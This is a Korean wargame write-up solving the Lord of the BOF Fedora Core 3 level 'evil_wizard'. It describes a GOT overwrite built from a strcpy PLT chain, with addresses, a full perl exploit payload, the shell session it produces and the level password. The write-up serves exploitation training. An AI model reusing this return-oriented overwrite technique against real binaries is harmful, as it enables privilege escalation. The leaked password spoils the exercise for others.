[LOB_FC3] hell_fire ->evil_wizard
#Env
- NX
- ascii armor
- random stack
#Technic
- got overwrite
- strcpy plt chain
evil_wizard.c 소스
buffer+length 이후 값을 날려버려서 ret sled로 사용할 인자가 없어졌다. 다른 방법을 이용해야 하는데 힌트로 GOT overwriting라고 준다.
문제 바이너리에서 setreuid로 권한 설정도 해주므로 GOT overwrite로 system함수를 실행시키면 되겠다.
* printf의 got에 system함수를 덮도록 한다
- system()의 주소 : 0x7507c0
- print의 PLT : 0x8048424
- print GOT : 0x8049884
- pop-pop-ret : 0x0804854f (문제에서 제공)
- strcpy의 PLT : 0x8048494
- "/bin/sh"의 주소 : 0x833603
[ strcpy call chain 구성 ]
strcpy의 PLT | pop-pop-ret | print의 GOT | &(0xc0)
strcpy의 PLT | pop-pop-ret | print의 GOT+1 | &(0x07)
strcpy의 PLT | pop-pop-ret | print의 GOT+2 | &(0x75)
strcpy의 PLT | pop-pop-ret | print의 GOT+3 | &(0x00)
&system(print의 plt) | dummy | &"/bin/bash"
공격코드 : "`perl -e 'print "a"x268, "\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x84\x98\x04\x08", "\x2c\x85\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x85\x98\x04\x08", "\xb0\x83\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x86\x98\x04\x08", "\xe9\x82\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x87\x98\x04\x08", "\x1b\x98\x04\x08", "\x24\x84\x04\x08", "a"x4, "\x03\x36\x83"'`"
[hell_fire@Fedora_1stFloor ~]$ ./evil_wizard "`perl -e 'print "a"x268, "\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x84\x98\x04\x08", "\x2c\x85\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x85\x98\x04\x08", "\xb0\x83\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x86\x98\x04\x08", "\xe9\x82\x04\x08","\x94\x84\x04\x08", "\x4f\x85\x04\x08", "\x87\x98\x04\x08", "\x1b\x98\x04\x08", "\x24\x84\x04\x08", "a"x4, "\x03\x36\x83"'`"
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaX輯봑?봑뀺봑녽봑$aaaa6?
sh-3.00$ id
uid=504(evil_wizard) gid=504(evil_wizard) groups=503(hell_fire) context=user_u:system_r:unconfined_t
sh-3.00$ my-pass
euid = 504
get down like that
sh-3.00$